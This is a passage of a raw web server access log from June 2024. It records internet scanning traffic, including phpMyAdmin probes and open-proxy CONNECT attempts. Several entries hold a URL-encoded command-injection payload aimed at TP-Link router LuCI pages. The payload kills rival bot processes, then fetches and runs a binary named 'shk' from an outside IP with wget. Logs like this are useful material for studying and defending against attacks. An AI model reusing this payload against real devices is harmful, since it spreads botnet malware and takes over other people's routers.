+0200] "GET /phpMyAdmin-2.5.4/scripts/setup.php HTTP/1.0" 404 760 42.192.92.229 - - [19/Jun/2024:09:54:42 +0200] "GET /phpMyAdmin-2.5.7-pl1/scripts/setup.php HTTP/1.0" 404 764 42.192.92.229 - - [19/Jun/2024:09:54:43 +0200] "GET /admin/pma/scripts/setup.php HTTP/1.0" 404 757 42.192.92.229 - - [19/Jun/2024:09:54:44 +0200] "GET /phpMyAdmin-2/scripts/setup.php HTTP/1.0" 404 756 42.192.92.229 - - [19/Jun/2024:09:54:57 +0200] "GET /admin/scripts/setup.php HTTP/1.0" 404 749 42.192.92.229 - - [19/Jun/2024:09:54:57 +0200] "GET /dbadmin/scripts/setup.php HTTP/1.0" 404 751 42.192.92.229 - - [19/Jun/2024:09:54:59 +0200] "GET /mysql/scripts/setup.php HTTP/1.0" 404 749 42.192.92.229 - - [19/Jun/2024:09:54:59 +0200] "GET /phpMyAdmin2/scripts/setup.php HTTP/1.0" 404 755 42.192.92.229 - - [19/Jun/2024:09:55:00 +0200] "GET /phpma/scripts/setup.php HTTP/1.0" 404 749 42.192.92.229 - - [19/Jun/2024:09:55:01 +0200] "GET /sqlweb/scripts/setup.php HTTP/1.0" 404 750 42.192.92.229 - - [19/Jun/2024:09:55:02 +0200] "GET /webdb/scripts/setup.php HTTP/1.0" 404 749 42.192.92.229 - - [19/Jun/2024:09:55:06 +0200] "GET /websql/scripts/setup.php HTTP/1.0" 404 750 42.192.92.229 - - [19/Jun/2024:09:55:13 +0200] "GET /php/scripts/setup.php HTTP/1.0" 404 747 42.192.92.229 - - [19/Jun/2024:09:55:16 +0200] "GET /admin/phpmyadmin/scripts/setup.txt HTTP/1.0" 404 764 42.192.92.229 - - [19/Jun/2024:09:55:16 +0200] "GET /db/scripts/setup.php HTTP/1.0" 404 746 42.192.92.229 - - [19/Jun/2024:09:55:17 +0200] "GET /sqlmanager/scripts/setup.php HTTP/1.0" 404 754 42.192.92.229 - - [19/Jun/2024:09:55:17 +0200] "GET /mysqlmanager/scripts/setup.php HTTP/1.0" 404 756 42.192.92.229 - - [19/Jun/2024:09:55:18 +0200] "GET /phpmanager/scripts/setup.php HTTP/1.0" 404 754 42.192.92.229 - - [19/Jun/2024:09:55:30 +0200] "GET /mysql-admin/scripts/setup.php HTTP/1.0" 404 755 65.49.1.12 - - [19/Jun/2024:10:01:39 +0200] "-" 400 1930 45.141.86.171 - - [19/Jun/2024:10:11:59 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 45.148.10.174 - - [19/Jun/2024:10:48:20 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 45.148.10.174 - - [19/Jun/2024:10:48:20 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 87.121.69.27 - - [19/Jun/2024:10:53:32 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 185.170.144.3 - - [19/Jun/2024:11:09:19 +0200] "-" 400 1930 74.82.47.54 - - [19/Jun/2024:11:16:36 +0200] "GET / HTTP/1.1" 200 1895 74.82.47.38 - - [19/Jun/2024:11:17:12 +0200] "GET /favicon.ico HTTP/1.1" 404 729 74.82.47.42 - - [19/Jun/2024:11:17:43 +0200] "GET /?format=json HTTP/1.1" 200 1895 74.82.47.46 - - [19/Jun/2024:11:18:07 +0200] "CONNECT www.shadowserver.org:443 HTTP/1.1" 400 804 172.245.131.82 - - [19/Jun/2024:11:28:39 +0200] "GET / HTTP/1.1" 200 1895 149.50.103.48 - - [19/Jun/2024:11:35:37 +0200] "GET / HTTP/1.1" 200 1895 141.98.11.15 - - [19/Jun/2024:12:25:53 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 87.121.69.27 - - [19/Jun/2024:13:00:21 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 149.50.103.48 - - [19/Jun/2024:13:22:39 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.27 - - [19/Jun/2024:13:25:51 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 143.198.192.137 - - [19/Jun/2024:13:31:40 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 206.168.32.110 - - [19/Jun/2024:13:55:47 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.110 - - [19/Jun/2024:13:55:51 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.110 - - [19/Jun/2024:13:55:51 +0200] "GET /favicon.ico HTTP/1.1" 404 729 45.148.10.174 - - [19/Jun/2024:14:12:23 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 45.148.10.174 - - [19/Jun/2024:14:12:23 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 207.167.66.182 - - [19/Jun/2024:14:16:16 +0200] "CONNECT www.baidu.com:443 HTTP/1.1" 400 804 167.71.235.190 - - [19/Jun/2024:14:27:59 +0200] "-" 400 1930 167.71.235.190 - - [19/Jun/2024:14:28:00 +0200] "-" 400 1930 167.71.235.190 - - [19/Jun/2024:14:28:00 +0200] "GET / HTTP/1.1" 200 1895 167.71.235.190 - - [19/Jun/2024:14:28:00 +0200] "GET /download/powershell/ HTTP/1.1" 404 746 78.108.177.50 - - [19/Jun/2024:14:45:16 +0200] "GET / HTTP/1.0" 200 1895 149.50.103.48 - - [19/Jun/2024:15:22:14 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.27 - - [19/Jun/2024:16:27:45 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 149.50.103.48 - - [19/Jun/2024:16:27:56 +0200] "GET / HTTP/1.1" 200 1895 91.92.245.67 - - [19/Jun/2024:17:19:07 +0200] "CONNECT api6.ipify.org:443 HTTP/1.1" 400 804 91.92.245.67 - - [19/Jun/2024:17:19:07 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804 91.92.245.67 - - [19/Jun/2024:18:05:40 +0200] "CONNECT api6.ipify.org:443 HTTP/1.1" 400 804 91.92.245.67 - - [19/Jun/2024:18:05:41 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804 45.148.10.174 - - [19/Jun/2024:18:46:42 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 45.148.10.174 - - [19/Jun/2024:18:46:42 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 87.121.69.27 - - [19/Jun/2024:19:22:07 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 64.226.81.230 - - [19/Jun/2024:19:53:52 +0200] "GET / HTTP/1.0" 200 1895 104.248.41.34 - - [19/Jun/2024:19:53:52 +0200] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 743 139.59.157.196 - - [19/Jun/2024:19:53:52 +0200] "GET /solr/admin/info/system HTTP/1.1" 404 752 139.59.157.196 - - [19/Jun/2024:19:53:52 +0200] "GET /solr/admin/cores?action=STATUS&wt=json HTTP/1.1" 404 742 206.189.57.111 - - [19/Jun/2024:19:53:52 +0200] "-" 400 1930 134.209.251.21 - - [19/Jun/2024:19:55:19 +0200] "GET /query?q=SHOW+DIAGNOSTICS HTTP/1.1" 404 723 141.98.11.15 - - [19/Jun/2024:19:58:51 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 141.98.11.82 - - [19/Jun/2024:20:04:01 +0200] "GET / HTTP/1.1" 200 1895 104.168.70.165 - - [19/Jun/2024:20:04:55 +0200] "GET / HTTP/1.1" 200 1895 104.248.35.48 - - [19/Jun/2024:20:17:23 +0200] "GET / HTTP/1.1" 200 1895 80.66.83.187 - - [19/Jun/2024:20:35:12 +0200] "-" 400 1930 92.255.191.251 - - [19/Jun/2024:20:39:25 +0200] "GET / HTTP/1.1" 200 1895 185.191.126.213 - - [19/Jun/2024:20:41:38 +0200] "GET / HTTP/1.1" 200 1895 138.197.192.154 - - [19/Jun/2024:20:47:38 +0200] "-" 400 1930 138.197.192.154 - - [19/Jun/2024:20:47:38 +0200] "-" 400 1930 138.197.192.154 - - [19/Jun/2024:20:47:38 +0200] "GET / HTTP/1.1" 200 1895 138.197.192.154 - - [19/Jun/2024:20:47:39 +0200] "GET /download/powershell/ HTTP/1.1" 404 746 87.121.69.27 - - [19/Jun/2024:20:53:48 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 194.44.32.140 - - [19/Jun/2024:20:56:24 +0200] "GET / HTTP/1.1" 200 1895 80.82.78.39 - - [19/Jun/2024:21:42:48 +0200] "GET / HTTP/1.1" 200 1895 80.82.78.39 - - [19/Jun/2024:21:42:50 +0200] "-" 400 1930 45.148.10.174 - - [19/Jun/2024:21:58:16 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 45.148.10.174 - - [19/Jun/2024:21:58:16 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 164.92.234.101 - - [19/Jun/2024:22:19:01 +0200] "-" 400 1930 164.92.234.101 - - [19/Jun/2024:22:19:01 +0200] "-" 400 1930 164.92.234.101 - - [19/Jun/2024:22:19:01 +0200] "-" 400 1930 164.90.170.123 - - [19/Jun/2024:22:20:27 +0200] "-" 400 1930 164.90.170.123 - - [19/Jun/2024:22:21:36 +0200] "GET /hello HTTP/1.1" 404 723 206.168.32.100 - - [19/Jun/2024:22:30:02 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.100 - - [19/Jun/2024:22:30:05 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.100 - - [19/Jun/2024:22:30:05 +0200] "GET /favicon.ico HTTP/1.1" 404 729 87.121.69.27 - - [19/Jun/2024:22:33:30 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 205.210.31.195 - - [19/Jun/2024:22:46:25 +0200] "GET / HTTP/1.1" 200 1895 194.59.31.99 - - [19/Jun/2024:22:53:36 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804 82.141.160.205 - - [19/Jun/2024:23:00:28 +0200] "GET / HTTP/1.0" 200 1895 164.90.174.244 - - [19/Jun/2024:23:39:31 +0200] "-" 400 1930 164.90.174.244 - - [19/Jun/2024:23:40:34 +0200] "GET /hello HTTP/1.1" 404 723